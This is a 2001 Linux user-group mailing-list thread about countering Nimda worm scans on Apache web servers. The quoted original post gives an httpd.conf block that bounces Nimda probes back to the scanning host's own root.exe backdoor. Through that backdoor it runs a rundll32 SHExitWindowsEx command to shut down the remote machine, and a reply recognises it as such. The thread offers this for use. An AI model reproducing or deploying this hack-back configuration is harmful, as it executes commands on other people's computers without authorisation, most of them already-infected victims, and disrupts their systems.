[NTLUG:Discuss] Possible new nimda counter-attack.
Richard Geoffrion
ntlug at rain.lewisville.tx.us
Wed Oct 10 12:13:50 CDT 2001
404 ... 303..... hey, whatever works.
also...
/c/winnt......
and
/d/winnt.....
are being called.
I did find an appropriate URL to forward nimda to...
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
topics/Nimda.asp
----- Original Message -----
From: "herrold" <herrold at owlriver.com>
To: <discuss at ntlug.org>
Sent: Wednesday, October 10, 2001 12:07 PM
Subject: Re: [NTLUG:Discuss] Possible new nimda counter-attack.
> hmmm
>
> looking thru my files I also see:
>
> /_vti_bin/* being asked for ...
>
> Your script appears to use the 'try to shut down the remote server'
> redirect
>
> Also -- why a 403, rather than a 303 redirect ?
>
> On Wed, 10 Oct 2001, Richard Geoffrion wrote:
>
> > Here is what I added to my httpd.conf file.
> >
> > # External Redirect of a nimda scan
> > <Location /scripts/*/winnt/system32/*>
> > Deny from all
> > ErrorDocument 403
> >
http://"$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWind
> > owsEx+5", "r"
> > # ErrorDocument 403 http://www.yahoo.com
> > </Location>
>
>
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>
More information about the Discuss
mailing list